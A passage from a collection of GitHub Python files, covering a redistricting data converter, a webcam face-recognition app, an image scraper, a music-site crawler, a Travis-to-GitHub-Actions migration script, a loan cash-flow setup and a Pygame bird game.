argparse import ArgumentParser, Namespace\nfrom typing import Any\n\nfrom baseline import *\n\n\ndef parse_args() -> Namespace:\n parser: ArgumentParser = argparse.ArgumentParser(\n description=\"Unpickle data to CSV format.\"\n )\n\n parser.add_argument(\n \"-s\",\n \"--state\",\n default=\"NC\",\n help=\"The two-character state code (e.g., NC)\",\n type=str,\n )\n parser.add_argument(\n \"-u\",\n \"--unit\",\n default=\"vtd\",\n help=\"The unit of granularity (e.g., vtd)\",\n type=str,\n )\n parser.add_argument(\n \"-w\", \"--water\", dest=\"water\", action=\"store_true\", help=\"Water-only precincts\"\n )\n\n parser.add_argument(\n \"-v\", \"--verbose\", dest=\"verbose\", action=\"store_true\", help=\"Verbose mode\"\n )\n\n args: Namespace = parser.parse_args()\n return args\n\n\ndef main() -> None:\n \"\"\"Convert pickled data to CSV format.\"\"\"\n\n args: Namespace = parse_args()\n\n xx: str = args.state\n unit: str = args.unit\n\n water: bool = args.water\n\n #\n\n assert not water # NOTE - Water-only precincts handled in Todd's baseline code.\n\n #\n\n ### DEBUG ###\n\n ### LOAD DATA ###\n\n rel_path: str = path_to_file([temp_dir]) + file_name(\n [xx, cycle, unit, \"data\"], \"_\", \"pickle\"\n )\n collection: FeatureCollection = FeatureCollection(rel_path)\n\n # Log # of water-only precincts -- DELETE\n\n water_precincts: list = list()\n if water:\n rel_path: str = path_to_file([data_dir, xx]) + file_name(\n [xx, cycle, unit, \"water_only\"], \"_\", \"csv\"\n ) # GEOID,ALAND,AWATER\n types: list = [str, int, int]\n water_precincts = [row[\"GEOID\"] for row in read_csv(rel_path, types)]\n print(f\"# of water-only precincts: {len(water_precincts)}\")\n\n ### WRITE DATA AS A CSV 
###\n\n l: list = list()\n for f in collection.features:\n row: dict = {\n \"GEOID\": f[\"geoid\"],\n \"POP\": f[\"pop\"],\n \"X\": f[\"xy\"].x,\n \"Y\": f[\"xy\"].y,\n }\n # Remove water-only precincts -- DELETE\n if f[\"geoid\"] in water_precincts:\n print(f\"Removing water-only precinct {f['geoid']}\")\n continue\n else:\n l.append(row)\n\n rel_path: str = path_to_file([data_dir, xx]) + file_name(\n [xx, cycle, unit, \"data\"], \"_\", \"csv\"\n )\n write_csv(rel_path, l, [\"GEOID\", \"POP\", \"X\", \"Y\"], precision=\"{:.14f}\")\n\n\nclass FeatureCollection:\n \"\"\"Collections of geographic features: precincts (VTDs), tracts, BGs, blocks.\"\"\"\n\n def __init__(self, features_path) -> None:\n self.features: list[Feature] = self._load(features_path)\n self.total_pop: int = 0\n self.avg_pop: int = 0\n\n self._calc_one_time_stats()\n\n def _load(self, rel_path: str) -> list[Feature]:\n unpickled: list[Feature] = read_pickle(rel_path)\n if not unpickled:\n raise Exception(\"Error: FeatureCollection.__init__(): Failed to load data.\")\n\n return unpickled\n\n def _calc_one_time_stats(self) -> None:\n for i, val in enumerate(self.features):\n self.total_pop += val[\"pop\"]\n\n self.avg_pop: int = round(self.total_pop / len(self.features))\n\n def check_feature_sizes(self, ndistricts: int) -> bool:\n \"\"\"Warn if any features are more populous than a target district.\"\"\"\n\n target_pop: int = round(self.total_pop / ndistricts)\n\n for i, val in enumerate(self.features):\n pop: int = val[\"pop\"]\n if pop > target_pop:\n geoid: str = val[\"geoid\"]\n\n print()\n print(\n f\"WARNING: Feature {geoid} has more people ({pop}) than the target district size ({target_pop}).\"\n )\n print()\n\n return False\n\n return True\n\n \"\"\"\n # Handle features more populous than a single district?\n \n for geoID in self.feature_pop:\n pop = self.feature_pop[geoID]\n\n fullreps = pop // self.target_pop\n if fullreps > 0:\n print(\n \"Feature {0} has enough people for {1} full districts.\".format(\n geoID, fullreps\n )\n )\n self.nreps -= fullreps\n self.feature_pop[geoID] -= fullreps * self.target_pop\n \"\"\"\n\n\nif __name__ == \"__main__\":\n main()\n\n### END ###\n","repo_name":"alecramsay/baseline","sub_path":"scripts/unpickle_to_csv.py","file_name":"unpickle_to_csv.py","file_ext":"py","file_size_in_byte":4639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"44127007870","text":"#!/usr/bin/env python3\n\n# --------------------------------------------------\n# Alexandre, Bruno, Pedro\n# SAVI, Outubro 2023.\n# --------------------------------------------------\n\n\"\"\"\nConventions\n\nFunctions -> camelCase\n\nVariables -> snake_case\n\nClass -> PascalCase\n\nClass objets -> camelCase\n\n\"\"\"\n# -----------------------------\n# Conventions\n# -----------------------------\n\n# Testing\n\nimport argparse\nimport os\nimport cv2\nfrom copy import deepcopy\nfrom functools import partial\nimport numpy as np\nimport imutils\nimport time\n\nfrom lib.keyboardActions import *\nfrom lib.trackers import Trackers\nfrom lib.createPersonData import createPersonData\nfrom lib.audio_pessoa_desconhecida import play_welcome,name_prompt\nfrom lib.audio_pessoa_conhecida import hello_again\nfrom lib.computeIOU import computeIOU\n\ndef main():\n # -----------------------------\n # Initialization\n # -----------------------------\n # * ---Configuration of argparse----\n parser = argparse.ArgumentParser(description='Human Identifier')\n parser.add_argument('-c', 
'--cascade', type=int, required=False,\n                        default=0, help='Defines which Haar cascade to use for detection')\n    parser.add_argument('-t', '--tracker', type=str, required=False,\n                        default=\"kcf\", help='Defines which tracker method to use for tracking')\n    parser.add_argument('-v', '--verbose',action='store_true', help='Prints debugging information')\n    args = vars(parser.parse_args())\n\n    # * Add adjustment parameters here\n    trackers_algorithms = {\n        \"csrt\": cv2.TrackerCSRT_create, # Slower but more accurate\n        \"kcf\": cv2.TrackerKCF_create, # A bit faster than csrt but less accurate\n        \"mosse\": cv2.legacy.TrackerMOSSE_create} # Fastest\n\n    # * Creating tracker based on argument parsed\n    tracker_type = trackers_algorithms[args[\"tracker\"]]\n\n\n    trackers = Trackers()\n\n    cascade_paths = [\"../files/cascades/haarcascade_frontalface_default.xml\",\n                     \"../files/cascades/haarcascade_frontalface_alt.xml\",\n                     \"../files/cascades/haarcascade_frontalface_alt2.xml\"\n                     ]\n\n    config = {\"playback_speed\": 30,\n              \"cascade\": {\"path\": cascade_paths[args[\"cascade\"]],\n                          \"scale_factor\": 1.1, # Smaller is more accurate but slower\n                          \"min_neighbours\": 17}, # More neighbours means more accurate detections\n              \"new_face_threshold\": 75,\n              \"IOU_threshold\": 0.4,\n              \"min_size_face_roi\":90}\n\n    yamls_path = '../files/yamls'\n    imgs_path = '../files/images'\n\n    # * Cleaning old execution files\n    for yaml_file in os.listdir(yamls_path):\n        yaml_file_path = f'{yamls_path}/{yaml_file}'\n\n        os.remove(yaml_file_path)\n\n    for img_file in os.listdir(imgs_path):\n        img_file_path = f'{imgs_path}/{img_file}'\n\n        os.remove(img_file_path)\n\n    for sound_file in os.listdir(\".\"):\n        if sound_file.endswith(\".mp3\"):\n            os.remove(sound_file)\n\n    # Camera ID 0 is usually webcam\n    cap = cv2.VideoCapture(0)\n\n    if not cap.isOpened():\n        print(\"Cannot open camera\")\n        exit()\n\n    prev_frame_time = 0\n    next_frame_time = 0\n    fps = 0\n\n    cv2.namedWindow(\"Image GUI\", cv2.WINDOW_NORMAL)\n    cv2.resizeWindow(\"Image GUI\", 600, 500)\n    # cv2.moveWindow(\"Image GUI\",1080,0)\n\n    face_recognizer_model = cv2.face.LBPHFaceRecognizer_create()\n    first_train = True\n\n    train_labels = []\n    train_images = []\n\n    last_new_label = 1\n\n    # -----------------------------\n    # Processing\n    # -----------------------------\n    while True:\n\n        ret, image_source = cap.read()\n\n        if not ret:\n            print(\"Can't receive frame from camera. 
Exiting ...\")\n            break\n\n        # Resizing image for easier handling\n        image_source = imutils.resize(image_source, width=600)\n        h, w, _ = image_source.shape\n\n        image_gui = deepcopy(image_source)\n\n        # Converting image to grayscale\n        image_gray = cv2.cvtColor(image_source, cv2.COLOR_BGR2GRAY)\n\n        # * Detecting\n        faces_rois = []\n\n        #* Tracked faces each frame\n        tracking_rois = []\n        # Loading the required haar-cascade xml classifier file\n        haar_cascade = cv2.CascadeClassifier(config[\"cascade\"][\"path\"])\n\n        # Applying the face detection method on the grayscale image\n        faces_rect = haar_cascade.detectMultiScale(image_gray, config[\"cascade\"][\"scale_factor\"], config[\"cascade\"][\"min_neighbours\"])\n\n        # Iterating through rectangles of detected faces\n        for (x, y, w, h) in faces_rect:\n            cv2.rectangle(image_gui, (x, y), (x+w, y+h), (0, 255, 0), 2)\n\n\n            if w < config[\"min_size_face_roi\"] or h < config[\"min_size_face_roi\"]:\n                continue\n\n            faces_rois.append(image_gray[y:y+h, x:x+w])\n\n\n        if len(faces_rect) != 0:\n            # * The first face will be on a completely untrained model, which crashes, so the first one necessarily has to be trained\n            if first_train:\n                # person_name = input(\"Hello, whats your name\\n\") \n                play_welcome()\n                person_name = name_prompt()\n\n                if person_name:\n                    train_labels.append(last_new_label)\n                    train_images.append(faces_rois[0])\n\n                    face_recognizer_model.train(train_images, np.array(train_labels))\n\n\n                    face_recognizer_model.setLabelInfo(last_new_label,person_name)\n\n                    bbox = faces_rect[0]\n                    trackers.add(tracker_type,image_source,bbox,last_new_label)\n\n                    createPersonData(faces_rois[0],last_new_label,face_recognizer_model)\n\n                    print(f'Saving {person_name} information')\n\n                    last_new_label += 1\n\n                    first_train = False\n                else:\n                    print(\"False positive, skipping\")\n\n\n\n        # * Use the LBP model to predict which face it should be\n\n        for face_roi,face_rect in zip(faces_rois,faces_rect):\n            \n            if first_train:\n                break\n\n            label, confidence = face_recognizer_model.predict(face_roi)\n            if args[\"verbose\"]:\n                print(f'\\n\\nLoss is {confidence}')\n                print(f'Person identified is {face_recognizer_model.getLabelInfo(label)}')\n\n\n            for tracker_dict in trackers.trackers:\n\n                # * Check if the detection overlaps any tracker\n\n\n                # * Iterate through trackers and see if any non active one matches the label\n                if not tracker_dict[\"ready2reInit\"]:\n                    continue\n\n                tracker_label = tracker_dict[\"label\"]\n\n                # * Reinitialize tracker\n                if tracker_label == label:\n                    tracker_dict[\"tracker\"] = tracker_type()\n                    tracker_dict[\"tracker\"].init(image_source,face_rect)\n\n                    person_name = face_recognizer_model.getLabelInfo(tracker_label)\n                    hello_again(person_name)\n\n                    tracker_dict[\"reInit_counter\"] = 0\n                    tracker_dict[\"ready2reInit\"] = False\n\n            # * Initially the untrained model shall not make confident predictions\n            # * Thus we can assume all predictions with less than a certain confidence are new faces\n\n            #* Find the tracker with the detected label\n            #* Check its IOU\n            #* Don't forget the case where it doesn't find any\n            for tracker_dict in trackers.trackers:\n\n                intersection_over_union = 0 # if it does not find any\n                \n                if tracker_dict[\"label\"] != label:\n                    continue\n\n                intersection_over_union = computeIOU(face_rect,tracker_dict[\"bbox\"])\n\n\n            if args[\"verbose\"]:\n                print(f'IOU of detection and tracking is : {intersection_over_union}')\n\n            if confidence > config[\"new_face_threshold\"] and intersection_over_union < config[\"IOU_threshold\"]:\n            # if confidence > config[\"new_face_threshold\"]:\n\n\n                
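# NOTE: with OpenCV's LBPH recognizer the returned 'confidence' is a distance,\n                # so larger values mean a weaker match. A weak match whose box also fails to\n                # overlap any currently tracked face (low IOU) is treated as a brand-new\n                # person, so the app greets them and prompts for a name below.\n                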
play_welcome()\n                person_name = name_prompt()\n                \n                if person_name:\n                    print(\"Adding new face\")\n                    bbox = face_rect\n                    trackers.add(tracker_type,image_source,bbox,last_new_label)\n\n\n                    face_recognizer_model.setLabelInfo(last_new_label,person_name)\n\n                    face_recognizer_model.update([face_roi], np.asarray([last_new_label])) \n\n                    createPersonData(face_roi,last_new_label,face_recognizer_model)\n                    \n                    print(f'Saving {person_name} information') \n\n                    last_new_label +=1\n                else:\n                    print(\"False positive, skipping\")\n\n\n        # * Tracking\n        # check to see if we are currently tracking an object\n        if trackers.latest_bboxs is not None:\n            # grab the new bounding box coordinates of the object\n            (successes, boxes) = trackers.update(image_source,face_recognizer_model)\n\n            for track_idx,(success,box) in enumerate(zip(successes,boxes)): \n                # check to see if the tracking was a success\n\n                if success:\n                    (x, y, w, h) = [int(v) for v in box]\n                    tracking_rois.append(image_gray[y:y+h, x:x+w])\n                    \n                    # * The tracked face should belong to the same person, hence all the tracked ROI's should be used to train the model\n                    # * to update the initially random weights\n                    train_labels.append(trackers.trackers[track_idx][\"label\"])\n                    train_images.append(tracking_rois[-1])\n                    \n                    # ! TRAIN STARTS FROM SCRATCH, I WANT UPDATE()\n                    face_recognizer_model.update([tracking_rois[-1]], np.array([trackers.trackers[track_idx][\"label\"]]))\n                    \n                    # face_recognizer_model.update(np.asarray(train_images)[-1,:,:], trackers.trackers[track_idx][\"label\"]) \n                    # face_recognizer_model.update([tracking_rois[-1]], np.asarray([trackers.trackers[track_idx][\"label\"]])) \n\n\n                    label2, confidence2 = face_recognizer_model.predict(tracking_rois[-1])\n                    label1, confidence1 = face_recognizer_model.predict(face_roi)\n                    # cv2.imshow(\"Ti1\",train_images[-1])\n                    # cv2.imshow(\"fr1\",face_roi)\n\n\n                    # print(f'Tracker ROI')\n                    # print(f'Confidence is {confidence2}')\n                    # print(f'Label is {label2}')\n\n                    # print(f'Face ROI')\n                    # print(f'Confidence is {confidence1}')\n                    # print(f'Label is {label1}')\n\n\n        # -----------------------------\n        # Visualization\n        # -----------------------------\n\n        # *Calculating fps\n        next_frame_time = time.time()\n        fps = 1/(next_frame_time-prev_frame_time)\n        prev_frame_time = next_frame_time\n\n        image_gui = cv2.putText(image_gui, f'{fps:.1f} FPS', (20, 20), cv2.FONT_HERSHEY_SIMPLEX,\n                                0.7, (0, 255, 0), 2, cv2.LINE_AA)\n\n        trackers.draw(image_gui,face_recognizer_model)\n        cv2.imshow('Image GUI', image_gui)\n\n        keyboardActions(config, image_gui)\n\n    # -----------------------------\n    # Termination\n    # -----------------------------\n    cap.release()\n    cv2.destroyAllWindows()\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"brunofavs/SAVI_TP1","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11961,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"42835458175","text":"def mais_populoso(dic):\n    maior = 0\n    strs = 0\n    for i in dic:\n        # reset the running total for each municipality, otherwise it accumulates\n        soma = 0\n        dicionariomunicipio = dic[i]\n        for e in dicionariomunicipio:\n            soma+= dicionariomunicipio[e]\n        if soma>maior:\n            maior = soma\n            strs = i\n    return strs","repo_name":"gabriellaec/desoft-analise-exercicios","sub_path":"backup/user_225/ch165_2020_06_11_22_04_34_657874.py","file_name":"ch165_2020_06_11_22_04_34_657874.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1148590041","text":"# Failure rate: highest first, sorted in descending order\nfrom 
bisect import bisect_left,bisect_right\ndef solution(N, stages):\n result = []\n stages.sort()\n total = len(stages)\n diff_arr = []\n for i in range(1, N+1):\n idx = bisect_left(stages,i)\n idx2 = bisect_right(stages,i)\n diff = idx2 - idx\n if diff == 0:\n diff_arr.append(0)\n else:\n diff_arr.append(diff/total)\n total -= diff\n dic = {}\n for i, v in enumerate(diff_arr):\n dic[i+1] = v\n result = sorted(dic.items(), key=lambda x: -x[1])\n answer = []\n # print(result)\n for a, _ in result:\n answer.append(a)\n # print(answer)\n return answer","repo_name":"julia0926/TIL_Algo","sub_path":"프로그래머스/lv1/42889. 실패율/실패율.py","file_name":"실패율.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11687819052","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Nov 1 16:04:12 2021\r\n\r\n@author: ayubh\r\n\"\"\"\r\n\r\nimport Pricing_and_Cashflows as cf\r\nimport pandas as pd\r\nimport random\r\n\r\ndf = pd.read_csv (r\"C:/Users/ayubh/Desktop/MBS MODEL/Loan_Data_1.csv\")\r\ndf.fillna(0, inplace=True)\r\nloan_df = pd.DataFrame(df)\r\n\r\ndef pd_data_frame_columns_to_float(data_frame, field_list):\r\n data_frame[field_list] = data_frame[field_list].astype(float)\r\n return data_frame\r\n\r\ndef generate_adjusted_cdr(row):\r\n change = random_change()\r\n adjusted_cdr = row['constant_default_rate'] * change / 100\r\n\r\n if adjusted_cdr < 0.005:\r\n return 0.005\r\n elif adjusted_cdr > 0.25:\r\n return 0.25\r\n return adjusted_cdr\r\n\r\n\r\ndef generate_adjusted_cpr(row):\r\n adjusted_cpr = row['constant_prepayment_rate'] * random_change(factor_number=5) / 100\r\n if adjusted_cpr > 0.25:\r\n return 0.25\r\n elif adjusted_cpr < 0.05:\r\n return 0.05\r\n return adjusted_cpr\r\n\r\n\r\ndef generate_adjusted_recovery(row):\r\n recovery = row['recovery_percentage'] * random_change(factor_number=1) / 100\r\n if recovery < 0:\r\n return 0.0\r\n elif recovery > 1.0:\r\n return 1.0\r\n return recovery\r\n\r\ndef label_tranche(row):\r\n if row['Lien_Position']==1:\r\n tranche_label=1\r\n else:\r\n tranche_label=2\r\n return tranche_label\r\n\r\ndef random_change(factor_number=3, change_range=5, how_many_chances=5):\r\n change = 0\r\n for i in range(factor_number):\r\n chance = random.randrange(how_many_chances)\r\n if chance == 1:\r\n change += random.uniform(-change_range, change_range)\r\n return 100 + change\r\n\r\n\r\n# Change pandas dtype of the following fields from object to float64.\r\nfield_list = [\r\n 'Current_Principal_Balance',\r\n 'Current_Interest_Rate',\r\n 'Original_Amount'\r\n # 'current_property_value',\r\n # 'deferred_balance',\r\n # 'gross_margin',\r\n # 'junior_lien_balance'\r\n # 'original_appraisal_amount',\r\n # 'original_rate',,\r\n # 'last_payment_received',\r\n # 'original_amount',\r\n # 'reset_index',\r\n # 'senior_lien_balance'\r\n \r\n ]\r\nloan_df = pd_data_frame_columns_to_float(data_frame=loan_df, field_list=field_list)\r\n\r\nloan_df['Original_Term'] = loan_df['Original_Term'].astype(int)\r\nloan_df['Lien_Position'] =loan_df ['Lien_Position']. 
astype(int)\r\n#senior tranche-> Lien position 1\r\n#junior tranche-> lien position 0 or 2\r\n\r\n# Add default economic assumptions.\r\nloan_df['constant_default_rate'] = float(0.10) / 100\r\n#override this to account for different prepayment speeds\r\nloan_df['constant_prepayment_rate'] = float(0.08) / 100\r\nloan_df['recovery_percentage'] = float(0.05) / 100\r\n\r\nadjusted_cdr_series = loan_df.apply(\r\n generate_adjusted_cdr,\r\n axis=1\r\n)\r\n\r\nloan_df['adjusted_cdr'] = adjusted_cdr_series\r\n\r\nadjusted_cpr_series = loan_df.apply(\r\n generate_adjusted_cpr,\r\n axis=1\r\n)\r\n\r\nloan_df['adjusted_cpr'] = adjusted_cpr_series\r\n\r\nadjusted_recovery_series = loan_df.apply(\r\n generate_adjusted_recovery,\r\n axis=1\r\n)\r\n\r\nloan_df['adjusted_recovery'] = adjusted_recovery_series\r\n\r\ntranch_group = loan_df.apply(label_tranche,axis=1)\r\nloan_df['tranch_level']=tranch_group\r\n\r\n\r\n\r\n#This will go in next code file for pricing\r\nx=cf.Loan_Portfolio(0.10,loan_df)\r\ny=x.cash_flows_aggregate_for_portfolio()\r\nz=x.cash_flow_tranchwise(loan_df)\r\nprint(y[\"total_payments\"])\r\n\r\n\r\n\r\n","repo_name":"AyushiVinayB/MBSModel","sub_path":"Full Model/create_Loan_Df.py","file_name":"create_Loan_Df.py","file_ext":"py","file_size_in_byte":3427,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"28859845541","text":"import os\nimport time\n\nimport requests\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.chrome.service import Service\nfrom webdriver_manager.chrome import ChromeDriverManager\n\nfrom tqdm import tqdm\n\nfrom scrapping.normalizer import normalize_image_to_rgb\n\n__authors__ = \"Diaz Chica Luis Felipe, Rodriguez Torres Sergio Andres\"\n__license__ = \"Apache 2.0\"\n\nos.chdir('../')\n\ndef scroll_to_end(wd):\n element = wd.find_element(By.TAG_NAME, 'body')\n for i in range(50):\n element.send_keys(Keys.PAGE_DOWN)\n time.sleep(0.3)\n\n\ndef fetch_image_urls(query: str, max_links_to_fetch: int, wd: webdriver, sleep_between_interactions: int = 1):\n # build the Google query\n search_url = \"https://www.google.com/search?safe=off&site=&tbm=isch&source=hp&q={q}&oq={q}&gs_l=img\"\n\n # load the page\n wd.get(search_url.format(q=query))\n\n image_urls = set()\n image_count = 0\n results_start = 0\n while image_count < max_links_to_fetch:\n scroll_to_end(wd)\n\n # get all image thumbnail results\n thumbnail_results = wd.find_elements(By.CSS_SELECTOR, \"img.Q4LuWd\")\n number_results = len(thumbnail_results)\n\n print(f\"Found: {number_results} search results. 
Extracting links from {results_start}:{number_results}\")\n\n        for img in thumbnail_results[results_start:number_results]:\n            # try to click every thumbnail such that we can get the real image behind it\n            try:\n                img.click()\n                time.sleep(sleep_between_interactions)\n            except Exception:\n                continue\n\n            # extract image urls\n            actual_images = wd.find_elements(By.CSS_SELECTOR, 'img.n3VNCb')\n            for actual_image in actual_images:\n                if actual_image.get_attribute('src') and 'http' in actual_image.get_attribute('src'):\n                    image_urls.add(actual_image.get_attribute('src'))\n\n            image_count = len(image_urls)\n\n            if len(image_urls) >= max_links_to_fetch:\n                print(f\"Found: {len(image_urls)} image links, done!\")\n                break\n        print(\"Found:\", len(image_urls), \"image links, looking for more ...\")\n        time.sleep(30)\n\n        # load_more_button = wd.find_elements(By.XPATH, '//input[@value=\"Show more results\"]')\n\n        # load_more_button = wd.find_element(By.CSS_SELECTOR, \".mye4qd\")\n        # if load_more_button:\n        #     load_more_button[0].click()\n\n        # move the result startpoint further down\n        results_start = len(thumbnail_results)\n\n    return image_urls\n\n\ndef persist_image(folder_path: str, url: str):\n    try:\n        image_content = requests.get(url, timeout=5).content\n        normalize_image_to_rgb(image_content, url, folder_path)\n    except Exception as e:\n        print(f\"ERROR - Could not download {url} - {e}\")\n\n\ndef search_and_download(search_term: str, target_path='./images', number_images=5):\n    target_folder = os.path.join(target_path, '_'.join(search_term.lower().split(' ')))\n\n    if not os.path.exists(target_folder):\n        os.makedirs(target_folder)\n\n    with webdriver.Chrome(service=Service(ChromeDriverManager().install())) as wd:\n        res = fetch_image_urls(search_term, number_images, wd=wd, sleep_between_interactions=0.5)\n\n    for elem in tqdm(res):\n        persist_image(target_folder, elem)\n\n\ndef main():\n    search_and_download(search_term=\"Activity Diagrams\", number_images=1000)\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"SergioRt1/An-analysis-of-diagram-images-on-Git-repositories","sub_path":"scrapping/scrapper.py","file_name":"scrapper.py","file_ext":"py","file_size_in_byte":3559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42627324893","text":"\nimport requests\nfrom bs4 import BeautifulSoup\n\n\nclass MelonCrawler:\n    def search_song(self, q):\n        \"\"\"\n        Return the list of results from searching Melon by song title\n        :param q: the song title to search for\n        :return: list of result dicts\n        \"\"\"\n        \"\"\"\n        1. Send a request with requests to\n        http://www.melon.com/search/song/index.htm\n        using a URL with the parameters q={q} and section=song\n        2. Create a BeautifulSoup instance soup from response.text\n        3. Shape the results from soup as needed\n        4. One Song instance per result\n        5. Put them all into a list and return it\n        6. Done!\n        \"\"\"\n        url = 'https://www.melon.com/search/song/index.htm'\n        params = {\n            'q': q,\n            'section': 'song',\n        }\n        response = requests.get(url, params)\n        soup = BeautifulSoup(response.text, 'lxml')\n        tr_list = soup.select('form#frm_defaultList table > tbody > tr')\n        # tr_list = soup.find('form', id='frm_defaultList').find('table').find('tbody').find_all('tr')\n\n        result = []\n        for tr in tr_list:\n            # e.g. 빨간 맛 (Red Flavor)\n            # song_id = re.search(r\"searchLog\\(.*'(\\d+)'\\)\", tr.select_one('td:nth-of-type(3) a.fc_gray').get('href')).group(1)\n            song_id = tr.select_one('td:nth-of-type(1) input[type=checkbox]').get('value')\n            title = tr.select_one('td:nth-of-type(3) a.fc_gray').get_text(strip=True)\n            artist = tr.select_one('td:nth-of-type(4) span.checkEllipsisSongdefaultList').get_text(\n                strip=True)\n            album = tr.select_one('td:nth-of-type(5) a').get_text(strip=True)\n\n            song = Song(song_id=song_id, title=title, artist=artist, album=album)\n            result.append(song)\n        return result\n","repo_name":"smallbee3/Crawler","sub_path":"lecture03_0126/melon_search_lhy.py","file_name":"melon_search_lhy.py","file_ext":"py","file_size_in_byte":2016,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72283508853","text":"import logging, pygit2\nimport os\nimport main\nfrom github import Github\nfrom pygit2 import GIT_SORT_TOPOLOGICAL, GIT_SORT_REVERSE, Signature\nimport subprocess\nimport click\n\nlogging.basicConfig(level=logging.INFO)\nlocal_repositories_path = \"./localrepos\"\nGA_BRANCH_NAME = \"ga-migration\"\n\n\ndef fullgit(repository_name):\n    # Clone\n    url_github = \"https://github.com/\"\n    org_name = \"inveniosoftware\"\n\n    # Setup GitHub\n    # Get an access token at https://github.com/settings/tokens/new\n    # and set it as env variable\n    # e.g. 
start the script as `GH_ACCESS_TOKEN=$TOKEN python gitflow.py`\n g = Github(os.environ[\"GH_ACCESS_TOKEN\"])\n\n # TODO: Check if folder already exists\n logging.info(f\"Cloning {url_github}{org_name}/{repository_name}..\")\n\n repo = pygit2.clone_repository(\n f\"{url_github}{org_name}/{repository_name}\",\n f\"{local_repositories_path}/{repository_name}\",\n )\n\n gh_repo = g.get_repo(f\"{org_name}/{repository_name}\")\n\n # Walk commits\n for commit in repo.walk(repo.head.target, GIT_SORT_TOPOLOGICAL):\n repo.checkout_tree(commit)\n logging.info(f\"Checking out {commit.tree_id}\")\n if os.path.isfile(\n f\"{local_repositories_path}/{repository_name}/.travis.yml\"\n ):\n print(\"found .travis.yml\")\n break\n\n logging.info(f\"Branching to {GA_BRANCH_NAME}..\")\n\n # TODO: If the branch already exists, append a number\n # and update GA_BRANCH_NAME\n repo.branches.local.create(GA_BRANCH_NAME, commit)\n\n subprocess.run(\n f\"git checkout {GA_BRANCH_NAME}\",\n shell=True,\n check=True,\n cwd=f\"{local_repositories_path}/{repository_name}\",\n )\n\n # Apply the patches\n main.migrate_repo(f\"{local_repositories_path}/{repository_name}\")\n\n # git add .\n subprocess.run(\n f\"git add .\",\n shell=True,\n check=True,\n cwd=f\"{local_repositories_path}/{repository_name}\",\n )\n\n # git commit\n logging.info(f\"Committing the changes..\")\n subprocess.run(\n f\"git commit -m 'Migrate from Travis CI to GitHub Actions'\",\n shell=True,\n check=True,\n cwd=f\"{local_repositories_path}/{repository_name}\",\n )\n\n # Switch from the HTTPS remote to the SSH one,\n # to allow non-interactive passwordless push if a key is available\n # TODO: just clone from the SSH origin from the beginning\n subprocess.run(\n f\"git remote set-url origin git@github.com:{org_name}/{repository_name}.git\",\n shell=True,\n check=True,\n cwd=f\"{local_repositories_path}/{repository_name}\",\n )\n\n # Push the new ga-migration branch\n logging.info(f\"Pushing branch '{GA_BRANCH_NAME}'\")\n subprocess.run(\n f\"git push --set-upstream origin ga-migration\",\n shell=True,\n check=True,\n cwd=f\"{local_repositories_path}/{repository_name}\",\n )\n\n # Look for the GA-migration issue\n open_issues = gh_repo.get_issues(state=\"open\")\n number = 0\n for issue in open_issues:\n if (\n \"migration to ga\" in issue.title.lower()\n or \"migration to github\" in issue.title.lower()\n ):\n number = issue.number\n logging.info(\n f\"Found the issue tracking the migration.. (#{number})\"\n )\n\n if number == 0:\n issue = gh_repo.create_issue(\n title=\"global: migration to github-actions from travis\"\n )\n number = issue.number\n logging.info(f\"Created issue {issue}\")\n\n # Create the Pull Request on GitHub\n pr = gh_repo.create_pull(\n title=\"Migrate to GH Actions\",\n body=f\"This PR was prepared by an [automated action](https://github.com/inveniosoftware/automation-tools/tree/master/automation_tools/scripts/ga-migration). 
Closes #{number}\",\n        head=GA_BRANCH_NAME,\n        base=\"master\",\n    )\n    logging.info(f\"Created Pull Request on GitHub {pr}\")\n\n\n@click.command()\n@click.option(\"--reponame\", help=\"Repository name\")\ndef pipeline(reponame):\n    fullgit(reponame)\n\n\nif __name__ == \"__main__\":\n    pipeline()\n","repo_name":"inveniosoftware/automation-tools","sub_path":"automation_tools/scripts/ga-migration/gitflow.py","file_name":"gitflow.py","file_ext":"py","file_size_in_byte":4084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29469757487","text":"from itertools import cycle\nimport random\nimport sys\n\nimport pygame\nfrom pygame.locals import *\n\nSCREEN_WIDTH = 350\nSCREEN_HEIGHT = 600\nSPEED = 10\nGRAVITY = 1\nGAME_SPEED = 10\n\nGROUND_WIDTH = 2 * SCREEN_WIDTH\nGROUND_HEIGHT = 100\n\nPIPE_WIDTH = 80\nPIPE_HEIGHT = 500\n\nPIPE_GAP = 200\n\nClock = pygame.time.Clock()\n\n\nclass Bird(pygame.sprite.Sprite):\n\n    def __init__(self):\n        pygame.sprite.Sprite.__init__(self)\n\n        self.images = [pygame.image.load('redbird-upflap.png').convert_alpha(),\n                       pygame.image.load('redbird-midflap.png').convert_alpha(),\n                       pygame.image.load('redbird-downflap.png').convert_alpha()]\n\n        self.speed = SPEED\n        self.angle = 0\n\n        self.current_image = 0\n\n        self.image = pygame.image.load('redbird-upflap.png').convert_alpha()\n        self.mask = pygame.mask.from_surface(self.image)\n\n        self.rect = self.image.get_rect()\n        self.rect[0] = SCREEN_WIDTH / 2 - 12\n        self.rect[1] = SCREEN_HEIGHT / 2 - 12\n\n    def update(self):\n        self.current_image = (self.current_image + 1) % 3\n        self.image = pygame.transform.rotate(self.images[self.current_image], self.angle)\n\n        self.speed += GRAVITY\n        self.rect[1] += self.speed\n        self.angle -= 